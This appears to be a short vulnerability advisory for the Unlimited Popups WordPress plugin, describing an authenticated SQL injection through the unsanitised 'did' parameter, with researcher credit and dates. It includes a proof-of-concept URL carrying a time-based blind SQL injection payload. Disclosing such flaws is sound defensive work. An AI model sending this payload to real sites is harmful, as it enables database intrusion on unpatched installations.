The plugin does not sanitise or escape the did GET parameter before using it in a SQL statement, available to users as low as editor, leading to an authenticated SQL Injection
https://plugins.trac.wordpress.org/browser/unlimited-popups/trunk/popuplist.php#L16 https://example.com/wp-admin/admin.php?page=popup&info=del&did=1%20AND%20(SELECT%204420%20FROM%20(SELECT(SLEEP(5)))yVXX)
Shreya Pohekar of Codevigilant Project
Yes
2021-10-07 (about 1 years ago)
2021-10-07 (about 1 years ago)
2022-04-09 (about 1 years ago)